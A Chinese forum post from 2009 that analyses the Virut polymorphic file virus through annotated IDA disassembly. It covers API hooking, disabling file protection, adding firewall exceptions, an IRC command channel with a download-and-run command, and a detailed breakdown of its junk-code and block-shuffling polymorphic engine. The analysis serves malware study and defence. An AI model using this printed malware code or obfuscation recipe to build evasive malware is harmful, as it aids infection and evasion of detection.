首页
社区
课程
招聘
[原创]virut分析
发表于: 2009-9-15 22:37 14653

[原创]virut分析

2009-9-15 22:37
14653

Virut完整分析

前言 
写这个东西唯一的目的就是找工作  貌似 我太功利了  
大概2个月前 去某公司应聘 被问住了  无比羞愧中 觉得自己水平真是很差

一:功能分析
virut的代码中用了不少 shellcode的优化技巧 
静态分析难度加大了点  不说废话了

1.通过 时间 随机确定 是否执行 病毒体主代码
.rsrc:01037C4C 80 EA C2                                sub     dl, 0C2h
.rsrc:01037C4F F8                                      clc
.rsrc:01037C50 B0 25                                   mov     al, 25h
.rsrc:01037C52 B2 46                                   mov     dl, 46h
.rsrc:01037C54 F6 E1                                   mul     cl
.rsrc:01037C56 00 85 FE 3E 00 00                       add     [ebp+3EFEh], al ; 103bb1c  ret  C3+25(0)  根据时间随机
.rsrc:01037C56                                                                 ; 决定 是否执行CALL 0103BADE
2.创建SECTION对象 对象名 通过时间来随机确定  复制代码到SECTION中,并执行
  SECTION 对象名\\BaseNamedObjects\\???tVt
3.进程列表中从第4个进程开始 HOOK 了 ZwCreateFile,ZwQueryInformationProcess,ZwCreateProcessEx,ZwOpenFile
并创建远程线程

.src:01038B2B 83 E9 05                                 sub     ecx, 5  
.rsrc:01038B2E 2B C8                                   sub     ecx, eax;计算函数偏移
.rsrc:01038B30 51                                      push    ecx
.rsrc:01038B31 68 00 00 00 E8                          push    0E8000000h
.rsrc:01038B36 8D 4C 24 03                             lea     ecx, [esp+8+var_5]
.rsrc:01038B3A 6A 00                                   push    0
.rsrc:01038B3C 6A 05                                   push    5
.rsrc:01038B3E 51                                      push    ecx
.rsrc:01038B3F 50                                      push    eax
.rsrc:01038B40 53                                      push    ebx
.rsrc:01038B41 6A 05                                   push    5
.rsrc:01038B43 8B CC                                   mov     ecx, esp
.rsrc:01038B45 50                                      push    eax
.rsrc:01038B46 8B D4                                   mov     edx, esp
.rsrc:01038B48 50                                      push    eax
.rsrc:01038B49 54                                      push    esp
.rsrc:01038B4A 6A 40                                   push    40h
.rsrc:01038B4C 51                                      push    ecx
.rsrc:01038B4D 52                                      push    edx
.rsrc:01038B4E 53                                      push    ebx
.rsrc:01038B4F FF 95 F8 50 1B 00                       call    dword ptr [ebp+1B50F8h];修改内存属性
.rsrc:01038B55 83 C4 0C                                add     esp, 0Ch
.rsrc:01038B58 FF 95 08 51 1B 00                       call    dword ptr [ebp+1B5108h];写入5个字节的指令
.rsrc:01038B5E 83 C4 08                                add     esp, 8
.rsrc:01038B61 C3                                      retn
4.
远程线程:
如果 进程是winlogon 则PATCH SFC的1号导出函数以关闭文件保护
.remote:001B220C                 mov     edx, ss:ExitThread[ebp]
.remote:001B2212                 sub     edx, edi
.remote:001B2214                 sub     edx, 7
.remote:001B2217                 mov     dword ptr [edi], 0E8006Ah
.remote:001B221D                 mov     [edi+3], edx    ; 替换   调用完NtWaitForMultipleObjects
.remote:001B221D                                         ;  线程直接退出
.remote:001B2220                 retn
(下面不贴代码了 没意思 ) 
写入注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
键为: 文件路径  值为: 文件路径:*:enabled:@shell32.dll,-1

打开\\Device\\PhysicalMemory对象  并创建线程恢复SSDT

连接到 irc.zief.pl
发送 NICK ????????\nUSER ?

发送  版本号 . . :#硬盘序列号 序列号累加和最后一字节 Service Pack版本\nJOIN
发送  #.364\n

接收命令  
接收: PING  则发送: POIN 
        设置注册表项SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer 键为UpdateHost 值为端口和主机IP的二进制值
接收: PRIV  子命令为!get 则下载文件 并运行
      子命令为!host 则更新 主机网址

二:变形的恢复
virut 代码大致可以分为 2部分 header和body  它的变种不少 但基本上只是 header变化body功能不变
而对于附件中的 样本来说
感染的过程中 header 多态变形(其实就是加花并乱序排列) body通过存放在header中的随机key加密自己
在感染前 virut 会自己把 变形后的header还原 
还原时 virut依靠两个结构BLOCK_DESCRI和RELOC_DESCRI来转换的

00000000 BLOCK_DESCRI    struc ; (sizeof=0x8)
00000000 o_NumberOfOpcode dw ?                   ; 变形前的opcode数目
00000002 o_offsetStart   dw ?                    ; 本块指令 变形前 在virut中的偏移
00000004 n_offsetStart   dw ?                    ; 本快指令变形后 在virut中的偏移
00000006 n_NumberOfOpcode dw ?                   ; 变形后 本块指令中opcode数目
00000006                                         ; 最高位为1时代表 本块指令变形前是以跳转指令或者返回指令结尾
00000008 BLOCK_DESCRI    ends

00000000 RELOC_DESCRI    struc ; (sizeof=0x6)
00000000 o_offset        dw ?                    ; 跳转指令操作数 变形前在virut中的偏移
00000002 NexOffset       dw ?                    ; 跳转指令 下一条指令的偏移
00000004 TarOffset       dw ?                    ; 跳转指令目的地址的偏移
00000006 RELOC_DESCRI    ends
virut多态的过程 实际上是把 header 分成一个个小的BLOCK 随机排列 并把相关信息 用BLOCK_DESCRI描述
RELOC_DESCRI是描述 header中的CALL 以及 JMP之类 需要重定位 操作数的指令 相关信息  
RELOC_DESCRI的值是固定不变的

.remote:001B1664                       restore_virut:                          ; DATA XREF: .remote:restore_viruto
.remote:001B1664 2D 64 16 1B 00                        sub     eax, offset restore_virut ; 变形代码恢复
.remote:001B1669 5E                                    pop     esi             ; virut_body病毒体起始处
.remote:001B166A 8B E8                                 mov     ebp, eax
.remote:001B166C 8D B8 00 10 1B 00                     lea     edi, old_header[eax] ; 变形前的 virut_header
.remote:001B1672 01 04 24                              add     [esp], eax
.remote:001B1675 2B B5 20 1B 1B 00                     sub     esi, ss:new_body_offset[ebp] ; 得到变形后的virut代码开始处
.remote:001B167B 33 D2                                 xor     edx, edx
.remote:001B167D FE 8D 23 17 1B 00                     dec     ss:number_block[ebp] ; 多态加密时 分块的个数
.remote:001B1683
.remote:001B1683                       loc_1B1683:                             ; CODE XREF: .remote:001B16E6j
.remote:001B1683 56                                    push    esi             ; after_change_virut_header入栈
.remote:001B1684 0F B7 9C D5 28 17+                    movzx   ebx, ss:block.n_offsetStart[ebp+edx*8]
.remote:001B168C 0F B7 8C D5 2A 17+                    movzx   ecx, ss:block.n_NumberOfOpcode[ebp+edx*8]
.remote:001B1694 03 F3                                 add     esi, ebx
.remote:001B1696 3B 9D 20 1B 1B 00                     cmp     ebx, ss:new_body_offset[ebp] ; 变形后的body在virut中的偏移
.remote:001B169C 76 06                                 jbe     short continue_restore ; 是否处理完  长度比较
.remote:001B169E 81 EB 34 3D 00 00                     sub     ebx, 3D34h
.remote:001B16A4
.remote:001B16A4                       continue_restore:                       ; CODE XREF: .remote:001B169Cj
.remote:001B16A4 81 E1 FF 7F 00 00                     and     ecx, 7FFFh
.remote:001B16AA
.remote:001B16AA                       loc_1B16AA:                             ; CODE XREF: .remote:001B16DBj
.remote:001B16AA 0F A3 9D 44 1A 1B+                    bt      ss:is_rabish[ebp], ebx ;  位测试为1的则是垃圾指令
.remote:001B16B1 73 03                                 jnb     short loc_1B16B6 ; 是否是花指令
.remote:001B16B3 46                                    inc     esi             ; 变形后的header地址增1
.remote:001B16B4 EB 24                                 jmp     short loc_1B16DA
.remote:001B16B6                       ; ---------------------------------------------------------------------------
.remote:001B16B6
.remote:001B16B6                       loc_1B16B6:                             ; CODE XREF: .remote:001B16B1j
.remote:001B16B6 83 BD 24 1B 1B 00+                    cmp     ss:flag_code_change[ebp], 0 ; 不是花指令
.remote:001B16BD 74 1A                                 jz      short loc_1B16D9
.remote:001B16BF 8B C3                                 mov     eax, ebx        ; ebx表示处理的指令  RVA
.remote:001B16C1 2B 85 24 1B 1B 00                     sub     eax, ss:flag_code_change[ebp] ; 要替换回来的指令 RVA   virut感染后
.remote:001B16C1                                                               ; 此处的代码会变  感染前是mov     ebx, [esp+24h] 4字节
.remote:001B16C1                                                               ; 感染后是mov     ebx, dword ptr ds:InterlockedIncrement
.remote:001B16C1                                                               ; 变为5字节
.remote:001B16C7 72 10                                 jb      short loc_1B16D9
.remote:001B16C9 83 F8 04                              cmp     eax, 4
.remote:001B16CC 73 0B                                 jnb     short loc_1B16D9
.remote:001B16CE 8A 84 28 28 1B 1B+                    mov     al, byte ptr changed_code[eax+ebp]
.remote:001B16D5 46                                    inc     esi
.remote:001B16D6 AA                                    stosb
.remote:001B16D7 EB 01                                 jmp     short loc_1B16DA
.remote:001B16D9                       ; ---------------------------------------------------------------------------
.remote:001B16D9
.remote:001B16D9                       loc_1B16D9:                             ; CODE XREF: .remote:001B16BDj
.remote:001B16D9                                                               ; .remote:001B16C7j ...
.remote:001B16D9 A4                                    movsb
.remote:001B16DA
.remote:001B16DA                       loc_1B16DA:                             ; CODE XREF: .remote:001B16B4j
.remote:001B16DA                                                               ; .remote:001B16D7j
.remote:001B16DA 43                                    inc     ebx
.remote:001B16DB E2 CD                                 loop    loc_1B16AA      ; header_1处理完后
.remote:001B16DD FE C2                                 inc     dl
.remote:001B16DF 5E                                    pop     esi
.remote:001B16E0 3A 95 23 17 1B 00                     cmp     dl, ss:number_block[ebp] ; 多态加密时 分块的个数
.remote:001B16E6 72 9B                                 jb      short loc_1B1683 ; after_change_virut_header入栈
.remote:001B16E8 68 22 00 00 00                        push    22h
.remote:001B16ED 8D B5 2C 1B 1B 00                     lea     esi, reloc_jmp.o_offset[ebp]
.remote:001B16F3 59                                    pop     ecx
.remote:001B16F4
.remote:001B16F4                       loc_1B16F4:                             ; CODE XREF: .remote:001B170Bj
.remote:001B16F4 0F B7 16                              movzx   edx, word ptr [esi]
.remote:001B16F7 0F B7 46 04                           movzx   eax, [esi+RELOC_DESCRI.TarOffset] ; 跳转指令目的地址的偏移
.remote:001B16FB 0F B7 5E 02                           movzx   ebx, [esi+RELOC_DESCRI.NexOffset] ; 跳转指令 下一条指令的偏移
.remote:001B16FF 2B C3                                 sub     eax, ebx
.remote:001B1701 89 84 2A 00 10 1B+                    mov     dword ptr old_header[edx+ebp], eax
.remote:001B1708 83 C6 06                              add     esi, 6
.remote:001B170B E2 E7                                 loop    loc_1B16F4
.remote:001B170D C6 85 8F 11 1B 00+                    mov     byte ptr [ebp+1B118Fh], 0
.remote:001B1714 C6 85 E0 11 1B 00+                    mov     byte ptr ss:decode_call[ebp], 0C3h ; call 1b104c
.remote:001B171B 83 A5 DA 54 1B 00+                    and     ss:dword_1B54DA[ebp], 0
.remote:001B1722 C3                                    retn
这段代码 已经逆出来了  写在附件的nochange.py   用IDApyton执行的  需要修改main函数的参数才能直接运行
也可以在virut_change.idb上直接运行脚本 不用修改参数 运行后 会生成virut_header.bin就是变形前的header了
附件中的virut_header.bin 是恢复好的header 共1e8字节  有兴趣的人可以对比下还原前和还原后的header代码

三:变形
virut通过HOOK 目标进程的ZwCreateFile, ZwOpenFile 实现感染
感染本身的过程不多说了  只要是个病毒 都那样搞的  感兴趣的是怎么实现 加花的
惭愧 分析完这个之后 我才算知道 怎么加花~

1.分块
分块的大体思路是这样的   先随机出 每个BLOCK应该包含的指令数  然后通过 长度反汇编引擎得到 指令的长度 填充
BLOCK_DESCRI 在header中有些特殊的地址 比如存放的字符串  以及解密body的随机KEY   当分块到它们时 不能
直接用长度反汇编引擎  因为它们根本不是指令  所以需要特殊照顾 代码如下:

.remote:001B38C1 004 C6 85 E8 38 1B 00+                mov     byte ptr ss:(loc_1B38E7+1)[ebp], 3 ; 设置机器码为push 3其实就是随机的参数
.remote:001B38C8
.remote:001B38C8                       loc_1B38C8:                             ; CODE XREF: sub_1B37FD+18Fj
.remote:001B38C8 004 83 A5 24 1B 1B 00+                and     ss:flag_code_change[ebp], 0 ; 要替换回来的指令 RVA   virut感染后
.remote:001B38C8 004 00                                                        ; 此处的代码会变  感染前是mov     ebx, [esp+24h] 4字节
.remote:001B38C8                                                               ; 感染后是mov     ebx, dword ptr ds:InterlockedIncrement
.remote:001B38C8                                                               ; 变为6字节
.remote:001B38CF 004 C6 85 23 17 1B 00+                mov     ss:number_block[ebp], 1 ; 多态加密时 分块的个数
.remote:001B38D6 004 8D B5 00 10 1B 00                 lea     esi, old_header[ebp]
.remote:001B38DC 004 8D BD 24 17 1B 00                 lea     edi, block.o_NumberOfOpcode[ebp]
.remote:001B38E2 004 66 83 67 02 00                    and     [edi+BLOCK_DESCRI.o_offsetStart], 0 ; 清空偏移
.remote:001B38E7
.remote:001B38E7                       loc_1B38E7:                             ; CODE XREF: sub_1B37FD+184j
.remote:001B38E7                                                               ; DATA XREF: sub_1B37FD:map_successw ...
.remote:001B38E7 004 6A 03                             push    3
.remote:001B38E9 008 58                                pop     eax
.remote:001B38EA 004 66 83 27 00                       and     word ptr [edi], 0
.remote:001B38EE 004 66 C7 47 06 00 80                 mov     word ptr [edi+6], 8000h;设置跳转标志
.remote:001B38F4 004 E8 2F E9 FF FF                    call    rand_mul        ; 返回[0:eax)
.remote:001B38F9 004 8D 4A 03                          lea     ecx, [edx+3]    ; 随机出 每个BLOCK包含的指令为 3~5条
.remote:001B38FC
.remote:001B38FC                       loc_1B38FC:                             ; CODE XREF: sub_1B37FD+165j
.remote:001B38FC 004 51                                push    ecx
.remote:001B38FD 008 8D 85 0A 10 1B 00                 lea     eax, event_name[ebp] ; "Vx_5"
.remote:001B3903 008 8D 8D 4A 10 1B 00                 lea     ecx, rand_key[ebp] ; 解密body的密钥
.remote:001B3909 008 8D 95 E0 11 1B 00                 lea     edx, decode_call[ebp] ; call 1b104c
.remote:001B390F 008 3B F0                             cmp     esi, eax         ;这里是3个特殊点
.remote:001B3911 008 75 08                             jnz     short loc_1B391B ;遇到特殊的3个点 直接得到长度
.remote:001B3913 008 68 05 00 00 00                    push    5
.remote:001B3918 00C 59                                pop     ecx
.remote:001B3919 008 EB 37                             jmp     short loc_1B3952
.remote:001B391B                       ; ---------------------------------------------------------------------------
.remote:001B391B
.remote:001B391B                       loc_1B391B:                             ; CODE XREF: sub_1B37FD+114j
.remote:001B391B 008 3B F1                             cmp     esi, ecx
.remote:001B391D 008 75 05                             jnz     short loc_1B3924
.remote:001B391F 008 6A 02                             push    2
.remote:001B3921 00C 59                                pop     ecx
.remote:001B3922 008 EB 2E                             jmp     short loc_1B3952
.remote:001B3924                       ; ---------------------------------------------------------------------------
.remote:001B3924
.remote:001B3924                       loc_1B3924:                             ; CODE XREF: sub_1B37FD+120j
.remote:001B3924 008 3B F2                             cmp     esi, edx
.remote:001B3926 008 75 09                             jnz     short loc_1B3931
.remote:001B3928 008 6A 05                             push    5
.remote:001B392A 00C C6 47 07 00                       mov     byte ptr [edi+7], 0
.remote:001B392E 00C 59                                pop     ecx
.remote:001B392F 008 EB 21                             jmp     short loc_1B3952
.remote:001B3931                       ; ---------------------------------------------------------------------------
.remote:001B3931
.remote:001B3931                       loc_1B3931:                             ; CODE XREF: sub_1B37FD+129j
.remote:001B3931 008 8A 06                             mov     al, [esi]
.remote:001B3933 008 3C E9                             cmp     al, 0E9h        ;检验是否是跳转指令和返回指令
.remote:001B3935 008 74 0C                             jz      short loc_1B3943
.remote:001B3937 008 3C EB                             cmp     al, 0EBh
.remote:001B3939 008 74 08                             jz      short loc_1B3943
.remote:001B393B 008 3C C2                             cmp     al, 0C2h
.remote:001B393D 008 74 04                             jz      short loc_1B3943
.remote:001B393F 008 3C C3                             cmp     al, 0C3h
.remote:001B3941 008 75 06                             jnz     short loc_1B3949 ; 不是跳转指令或者返回指令
.remote:001B3943
.remote:001B3943                       loc_1B3943:                             ; CODE XREF: sub_1B37FD+138j
.remote:001B3943                                                               ; sub_1B37FD+13Cj ...
.remote:001B3943 008 C6 47 07 80                       mov     byte ptr [edi+7], 80h ; 设置跳转指令的标志
.remote:001B3947 008 EB 04                             jmp     short loc_1B394D
.remote:001B3949                       ; ---------------------------------------------------------------------------
.remote:001B3949
.remote:001B3949                       loc_1B3949:                             ; CODE XREF: sub_1B37FD+144j
.remote:001B3949 008 C6 47 07 00                       mov     byte ptr [edi+7], 0 ; 清空标志
.remote:001B394D
.remote:001B394D                       loc_1B394D:                             ; CODE XREF: sub_1B37FD+14Aj
.remote:001B394D 008 E8 C2 12 00 00                    call    get_instruction_length;长度反汇编引擎
.remote:001B3952
.remote:001B3952                       loc_1B3952:                             ; CODE XREF: sub_1B37FD+11Cj
.remote:001B3952                                                               ; sub_1B37FD+125j ...
.remote:001B3952 008 66 01 0F                          add     [edi], cx
.remote:001B3955 008 8D 85 E8 11 1B 00                 lea     eax, loc_1B11E8[ebp]
.remote:001B395B 008 03 F1                             add     esi, ecx
.remote:001B395D 008 3B F0                             cmp     esi, eax
.remote:001B395F 008 59                                pop     ecx
.remote:001B3960 004 73 2F                             jnb     short loc_1B3991 ; 分块结束从此处跳出
.remote:001B3962 004 E2 98                             loop    loc_1B38FC
.remote:001B3964 004 FE 85 23 17 1B 00                 inc     ss:number_block[ebp] ; 多态加密时 分块的个数
.remote:001B396A 004 80 BD 23 17 1B 00+                cmp     ss:number_block[ebp], 63h ; 多态加密时 分块的个数
.remote:001B3971 004 77 13                             ja      short loc_1B3986
.remote:001B3973 004 66 8B 47 02                       mov     ax, [edi+BLOCK_DESCRI.o_offsetStart] ; 本块指令 变形前 在virut中的偏移
.remote:001B3977 004 66 03 07                          add     ax, [edi]
.remote:001B397A 004 83 C7 08                          add     edi, 8          ; 偏移+数目 = 下一块指令的偏移
.remote:001B397D 004 66 89 47 02                       mov     [edi+BLOCK_DESCRI.o_offsetStart], ax ; 本块指令 变形前 在virut中的偏移
.remote:001B3981 004 E9 61 FF FF FF                    jmp     loc_1B38E7
.remote:001B3986                       ; ---------------------------------------------------------------------------
.remote:001B3986
.remote:001B3986                       loc_1B3986:                             ; CODE XREF: sub_1B37FD+174j
.remote:001B3986 004 FE 85 E8 38 1B 00                 inc     byte ptr ss:(loc_1B38E7+1)[ebp]
.remote:001B398C 004 E9 37 FF FF FF                    jmp     loc_1B38C8      ; 如果分块过多的话 增加 随机的指令数
.remote:001B3991                       ; ---------------------------------------------------------------------------
.remote:001B3991
.remote:001B3991                       loc_1B3991:                             ; CODE XREF: sub_1B37FD+163j
.remote:001B3991 004 83 C7 08                          add     edi, 8
.remote:001B3994 004 66 C7 07 34 3D                    mov     [edi+BLOCK_DESCRI.o_NumberOfOpcode], 3D34h ; 描述 病毒体
.remote:001B3999 004 66 C7 47 02 E8 01                 mov     [edi+BLOCK_DESCRI.o_offsetStart], 1E8h ; 本块指令 变形前 在virut中的偏移
.remote:001B399F 004 66 C7 47 06 34 BD                 mov     [edi+BLOCK_DESCRI.n_NumberOfOpcode], 0BD34h ; 变形后 本块指令中opcode数目
.remote:001B399F 004                                                           ; 最高位为1时代表 本块指令变形前是以跳转指令或者返回指令结尾
.remote:001B39A5 004 FE 85 23 17 1B 00                 inc     ss:number_block[ebp] ; 多态加密时 分块的个数
.remote:001B39AB 004 8B B5 86 54 1B 00                 mov     esi, ss:lpFileBase[ebp]
理论上分块可以无限多  但是实际上 分块不能超过80H个  virut设置了 4个双字作为BIT STRING 确定BLOCK是否被处理过的
分块超过80H时  会覆盖BIT STRING 下面的数据  不过对于病毒来说 80H的块足够了

2.乱序排列  这里的代码更长了....
基本思路就是 随机一个数  通过这个数 确定 先复制哪个BLOCK 循环 直到复制完毕   复制的过程中通过随机数确定是否插入
花指令   复制完后如果 BLOCK 不是以跳转指令或者返回指令 就增加一个跳转指令 以便将 变形前在一起的BLOCK 变形后
可以通过跳转指令连接在一起
.remote:001B3BD0 010 8B BD CE 54 1B 00                 mov     edi, ss:virut_start_in_file_off[ebp]
.remote:001B3BD6
.remote:001B3BD6                       loc_1B3BD6:                             ; CODE XREF: sub_1B37FD+23Fj
.remote:001B3BD6                                                               ; sub_1B37FD+249j
.remote:001B3BD6 010 0F B6 8D 23 17 1B+                movzx   ecx, ss:number_block[ebp] ; 多态加密时 分块的个数
.remote:001B3BDD
.remote:001B3BDD                       loc_1B3BDD:                             ; CODE XREF: sub_1B37FD+60Ej
.remote:001B3BDD 010 8B C1                             mov     eax, ecx
.remote:001B3BDF 010 E8 44 E6 FF FF                    call    rand_mul        ; 返回[0:eax)
.remote:001B3BE4 010 33 C0                             xor     eax, eax        ; 随机0~number_block这里 开始乱序 排列指令块
.remote:001B3BE6
.remote:001B3BE6                       loc_1B3BE6:                             ; CODE XREF: sub_1B37FD+3F8j
.remote:001B3BE6 010 0F A3 85 BE 54 1B+                bt      ss:flag_block[ebp], eax ; 这里4个双字代表BLOCK是否已经变形的标志位串
.remote:001B3BE6 010 00                                                        ; 这里也可以看出 分块时数量不能超过80H
.remote:001B3BED 010 72 04                             jb      short loc_1B3BF3
.remote:001B3BEF 010 FE CA                             dec     dl
.remote:001B3BF1 010 78 04                             js      short loc_1B3BF7
.remote:001B3BF3
.remote:001B3BF3                       loc_1B3BF3:                             ; CODE XREF: sub_1B37FD+3F0j
.remote:001B3BF3 010 FE C0                             inc     al
.remote:001B3BF5 010 EB EF                             jmp     short loc_1B3BE6 ; 找到第dl个未处理的指令块
.remote:001B3BF7                       ; ---------------------------------------------------------------------------
.remote:001B3BF7
.remote:001B3BF7                       loc_1B3BF7:                             ; CODE XREF: sub_1B37FD+3F4j
.remote:001B3BF7 010 8B D7                             mov     edx, edi
.remote:001B3BF9 010 0F AB 85 BE 54 1B+                bts     ss:flag_block[ebp], eax ; 置位flag_block对应的BIT  表示 该指令块已被处理过
.remote:001B3C00 010 2B 95 CE 54 1B 00                 sub     edx, ss:virut_start_in_file_off[ebp]
.remote:001B3C06 010 51                                push    ecx
.remote:001B3C07 014 66 89 94 C5 28 17+                mov     ss:block.n_offsetStart[ebp+eax*8], dx
.remote:001B3C0F 014 0F B7 B4 C5 26 17+                movzx   esi, ss:block.o_offsetStart[ebp+eax*8]
.remote:001B3C17 014 0F B7 8C C5 24 17+                movzx   ecx, word ptr ss:block.o_NumberOfOpcode[ebp+eax*8]
.remote:001B3C1F 014 81 FE E8 01 00 00                 cmp     esi, 1E8h ;1E8是变形前HEADER的大小
.remote:001B3C25 014 8D B4 35 00 10 1B+                lea     esi, old_header[ebp+esi]
.remote:001B3C2C 014 75 10                             jnz     short loc_1B3C3E
.remote:001B3C2E 014 C1 E9 02                          shr     ecx, 2          ; 复制body到宿主中去
.remote:001B3C31 014 89 95 20 1B 1B 00                 mov     ss:new_body_offset[ebp], edx ; 变形后的body在virut中的偏移
.remote:001B3C37 014 F3 A5                             rep movsd
.remote:001B3C39 014 E9 B3 01 00 00                    jmp     loc_1B3DF1
.remote:001B3C3E                       ; ---------------------------------------------------------------------------
.remote:001B3C3E
.remote:001B3C3E                       loc_1B3C3E:                             ; CODE XREF: sub_1B37FD+42Fj
.remote:001B3C3E                                                               ; sub_1B37FD+5EFj
.remote:001B3C3E 014 85 C9                             test    ecx, ecx
.remote:001B3C40 014 0F 84 AB 01 00 00                 jz      loc_1B3DF1      ; 指令块处理完则跳
.remote:001B3C46 014 51                                push    ecx             ; 还需要处理的opcode数目
.remote:001B3C47 018 50                                push    eax             ; 指令块结构数组的 下标
.remote:001B3C48 01C B0 02                             mov     al, 2
.remote:001B3C4A 01C E8 D9 E5 FF FF                    call    rand_mul        ; 返回[0:eax)
.remote:001B3C4F 01C 0A D2                             or      dl, dl
.remote:001B3C51 01C 0F 85 4C 01 00 00                 jnz     loc_1B3DA3      ; 随机生成0,1  为1则生成花指令
.remote:001B3C57 01C 8B C6                             mov     eax, esi
.remote:001B3C59 01C 2B C5                             sub     eax, ebp
.remote:001B3C5B 01C 3D 0A 10 1B 00                    cmp     eax, offset event_name ; "Vx_5"
.remote:001B3C60 01C 75 0B                             jnz     short loc_1B3C6D ; 3个特殊点
.remote:001B3C62 01C 68 05 00 00 00                    push    5
.remote:001B3C67 020 59                                pop     ecx
.remote:001B3C68 01C E9 25 01 00 00                    jmp     loc_1B3D92
.remote:001B3C6D                       ; ---------------------------------------------------------------------------
.remote:001B3C6D
.remote:001B3C6D                       loc_1B3C6D:                             ; CODE XREF: sub_1B37FD+463j
.remote:001B3C6D 01C 3D 4A 10 1B 00                    cmp     eax, offset rand_key ; 解密body的密钥
.remote:001B3C72 01C 75 08                             jnz     short loc_1B3C7C
.remote:001B3C74 01C 6A 02                             push    2
.remote:001B3C76 020 59                                pop     ecx
.remote:001B3C77 01C E9 16 01 00 00                    jmp     loc_1B3D92
.remote:001B3C7C                       ; ---------------------------------------------------------------------------
.remote:001B3C7C
.remote:001B3C7C                       loc_1B3C7C:                             ; CODE XREF: sub_1B37FD+475j
.remote:001B3C7C 01C 3D E0 11 1B 00                    cmp     eax, offset decode_call ; call 1b104c
.remote:001B3C81 01C 75 08                             jnz     short loc_1B3C8B
.remote:001B3C83 01C 6A 05                             push    5
.remote:001B3C85 020 59                                pop     ecx
.remote:001B3C86 01C E9 07 01 00 00                    jmp     loc_1B3D92
.remote:001B3C8B                       ; ---------------------------------------------------------------------------
.remote:001B3C8B
.remote:001B3C8B                       loc_1B3C8B:                             ; CODE XREF: sub_1B37FD+484j
.remote:001B3C8B 01C 80 BD 10 55 1B 00+                cmp     ss:flag_find_import[ebp], 0FFh ; 是否找到导入kernel的函数
.remote:001B3C92 01C 74 6C                             jz      short no_find
.remote:001B3C94 01C 3D DB 10 1B 00                    cmp     eax, offset code_change ; 被修改的函数
.remote:001B3C99 01C 72 65                             jb      short no_find
.remote:001B3C9B 01C 3D E3 10 1B 00                    cmp     eax, offset loc_1B10E3
.remote:001B3CA0 01C 73 5E                             jnb     short no_find
.remote:001B3CA2 01C 80 7E 01 5C                       cmp     byte ptr [esi+1], 5Ch
.remote:001B3CA6 01C 75 58                             jnz     short no_find
.remote:001B3CA8 01C AD                                lodsd
.remote:001B3CA9 01C 8B D7                             mov     edx, edi
.remote:001B3CAB 01C 89 85 28 1B 1B 00                 mov     dword ptr ss:changed_code[ebp], eax
.remote:001B3CB1 01C AA                                stosb                   ; 存入mov指令
.remote:001B3CB2 01C B0 1D                             mov     al, 1Dh
.remote:001B3CB4 01C 2B 95 CE 54 1B 00                 sub     edx, ss:virut_start_in_file_off[ebp]
.remote:001B3CBA 01C AA                                stosb
.remote:001B3CBB 01C 6A 04                             push    4
.remote:001B3CBD 020 8B 85 02 55 1B 00                 mov     eax, ss:va_thunk_data[ebp]
.remote:001B3CC3 020 3B 95 20 1B 1B 00                 cmp     edx, ss:new_body_offset[ebp] ; 变形后的body在virut中的偏移
.remote:001B3CC9 020 76 06                             jbe     short loc_1B3CD1
.remote:001B3CCB 020 81 EA 34 3D 00 00                 sub     edx, 3D34h
.remote:001B3CD1
.remote:001B3CD1                       loc_1B3CD1:                             ; CODE XREF: sub_1B37FD+4CCj
.remote:001B3CD1 020 59                                pop     ecx
.remote:001B3CD2 01C AB                                stosd                   ; 生成mov ebx,dword ptr[xxxxxxxx]
.remote:001B3CD3 01C 89 95 24 1B 1B 00                 mov     ss:flag_code_change[ebp], edx ; 要替换回来的指令 RVA   virut感染后
.remote:001B3CD3 01C                                                           ; 此处的代码会变  感染前是mov     ebx, [esp+24h] 4字节
.remote:001B3CD3                                                               ; 感染后是mov     ebx, dword ptr ds:InterlockedIncrement
.remote:001B3CD3                                                               ; 变为6字节
.remote:001B3CD9
.remote:001B3CD9                       loc_1B3CD9:                             ; CODE XREF: sub_1B37FD+4E4j
.remote:001B3CD9 01C 0F B3 95 44 1A 1B+                btr     ss:is_rabish[ebp], edx ;  位测试为1的则是垃圾指令
.remote:001B3CE0 01C 42                                inc     edx
.remote:001B3CE1 01C E2 F6                             loop    loc_1B3CD9      ; 设置标志
.remote:001B3CE3 01C 8B 04 24                          mov     eax, [esp+1Ch+var_1C]
.remote:001B3CE6 01C 66 83 84 C5 2A 17+                add     ss:block.n_NumberOfOpcode[ebp+eax*8], 4
.remote:001B3CEF 01C 83 6C 24 04 04                    sub     [esp+1Ch+var_18], 4 ; 需处理的数目-4
.remote:001B3CF4 01C B1 02                             mov     cl, 2
.remote:001B3CF6 01C E9 BA 00 00 00                    jmp     loc_1B3DB5      ; 修改指令为bts
.remote:001B3CF6                       ; END OF FUNCTION CHUNK FOR sub_1B37FD
.remote:001B3CFB                       ; ---------------------------------------------------------------------------
.remote:001B3CFB E9 92 00 00 00                        jmp     loc_1B3D92
.remote:001B3D00                       ; ---------------------------------------------------------------------------
.remote:001B3D00                       ; START OF FUNCTION CHUNK FOR sub_1B37FD
.remote:001B3D00
.remote:001B3D00                       no_find:                                ; CODE XREF: sub_1B37FD+495j
.remote:001B3D00                                                               ; sub_1B37FD+49Cj ...
.remote:001B3D00 01C 3D 73 11 1B 00                    cmp     eax, offset ret_to_host
.remote:001B3D05 01C 0F 85 82 00 00 00                 jnz     loc_1B3D8D
.remote:001B3D0B 01C 80 BD 10 55 1B 00+                cmp     ss:flag_find_import[ebp], 0 ; 是否找到导入kernel的函数
.remote:001B3D12 01C 72 79                             jb      short loc_1B3D8D
.remote:001B3D14 01C 80 BD 10 55 1B 00+                cmp     ss:flag_find_import[ebp], 2 ; 是否找到导入kernel的函数
.remote:001B3D1B 01C 73 70                             jnb     short loc_1B3D8D
.remote:001B3D1D 01C 80 BD 10 55 1B 00+                cmp     ss:flag_find_import[ebp], 0 ; 是否找到导入kernel的函数
.remote:001B3D24 01C 75 06                             jnz     short loc_1B3D2C
.remote:001B3D26 01C 89 BD 12 55 1B 00                 mov     ss:ret_to_host_address[ebp], edi
.remote:001B3D2C
.remote:001B3D2C                       loc_1B3D2C:                             ; CODE XREF: sub_1B37FD+527j
.remote:001B3D2C 01C 0F B6 85 11 55 1B+                movzx   eax, ss:rand_flag[ebp] ; 决定恢复OEP的两条指令  顺序
.remote:001B3D33 01C 6A 07                             push    7
.remote:001B3D35 020 6B C0 03                          imul    eax, 3
.remote:001B3D38 020 59                                pop     ecx
.remote:001B3D39 01C 8B 95 FE 54 1B 00                 mov     edx, ss:old_entrypoint[ebp]
